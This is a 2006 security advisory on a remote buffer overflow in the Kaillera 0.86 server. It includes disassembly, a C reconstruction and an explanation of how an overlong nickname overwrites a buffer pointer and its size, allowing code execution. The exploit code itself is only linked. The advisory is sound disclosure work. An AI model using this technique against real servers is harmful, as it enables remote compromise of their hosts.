Possible code execution in Kaillera 0.86
#######################################################################
Luigi Auriemma
Application: Kaillera
http://www.kaillera.com
Versions: <= 0.86
Platforms: Windows, Linux and FreeBSD
Bug: buffer-overflow
Exploitation: remote, versus server
Date: 06 Jul 2006
Author: Luigi Auriemma
e-mail: aluigi@xxxxxxxxxxxxx
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Kaillera is a middleware software for implementing network capabilities
in emulators like MAME, MameLang32+, Bliss, NESten, Jnes, Nemu64,
Modeler, Gens, WinUAE, PCAE, Kawaks and possibly others.
Although the latest server's version has been released over 4 years ago
it's still widely used as demonstrated by the online servers lists.
#######################################################################
======
2) Bug
======
The handling of almost all the Kaillera messages is made through the
reading of the first NULL terminated string and the subsequent reading
of the remaining data in the message (its content will be parsed in
another step).
For these operations Kaillera uses a static buffer of 32 bytes and a
data buffer which is reallocated everytime that the size of the client
message is bigger than the actual allocated size of the buffer.
The instructions which handle these types of messages start from about
offset 004019f1 of the Windows server 0.86:
004019F1 |. 33C9 XOR ECX,ECX
004019F3 |. 8A06 MOV AL,BYTE PTR DS:[ESI]
004019F5 |. 57 PUSH EDI
004019F6 |. 84C0 TEST AL,AL
004019F8 |. 74 0C JE SHORT KAILLERA.00401A06
004019FA |> 46 /INC ESI
004019FB |. 88440B 04 |MOV BYTE PTR DS:[EBX+ECX+4],AL
004019FF |. 41 |INC ECX
00401A00 |. 8A06 |MOV AL,BYTE PTR DS:[ESI]
00401A02 |. 84C0 |TEST AL,AL
00401A04 |.^75 F4 \JNZ SHORT KAILLERA.004019FA
00401A06 |> 8B6C24 18 MOV EBP,DWORD PTR SS:[ESP+18]
00401A0A |. C64419 04 00 MOV BYTE PTR DS:[ECX+EBX+4],0
00401A0F |. 2BE9 SUB EBP,ECX
00401A11 |. 8BCB MOV ECX,EBX
00401A13 |. 83ED 02 SUB EBP,2
00401A16 |. 55 PUSH EBP
00401A17 |. E8 D4FCFFFF CALL KAILLERA.004016F0
00401A1C |. 8B7B 24 MOV EDI,DWORD PTR DS:[EBX+24]
00401A1F |. 8BCD MOV ECX,EBP
00401A21 |. 8BD1 MOV EDX,ECX
00401A23 |. 46 INC ESI
00401A24 |. C1E9 02 SHR ECX,2
00401A27 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
which can be traduced (plus or less) in C like the following code:
static char nick[32],
*data;
...
int nick_size,
data_size;
for(nick_size = 0; *client_msg; nick_size++, client_msg++) {
nick[nick_size] = *client_msg;
}
nick[nick_size] = 0;
client_msg++;
data_size = (client_msg_size - nick_size) - 2;
data = 004016f0(data_size); // realloc data if needed
memcpy(data, client_msg, data_size);
...
004016f0(int size) {
if(size <= data_alloc_size) return;
do {
data_alloc_size <<= 1;
} while(size > data_alloc_size);
data = realloc(data, data_alloc_size);
}
If an attacker uses a nickname longer than 32 bytes he can overwrite
the address of the data buffer and the value in which is stored its
actual allocated size, the following scheme shows that piece of memory:
ooooooooooooooooooooooooooooooooXXXXYYYY
| | |
| | amount of data currently allocated
| pointer to the data buffer
static buffer of 32 bytes
With the overwriting of YYYY we can bypass the first check made by the
function at offset 004016f0 which does a realloc of the buffer if
needed since we control the actual allocated size and then we can
decide where copying the rest of our message in the memory of the
server since the address of data XXXX is controlled by us too.
That leads to the possibility of executing malicious code.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/kailleraex.zip
#######################################################################
======
4) Fix
======
The developers will release a new version soon
#######################################################################
---
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org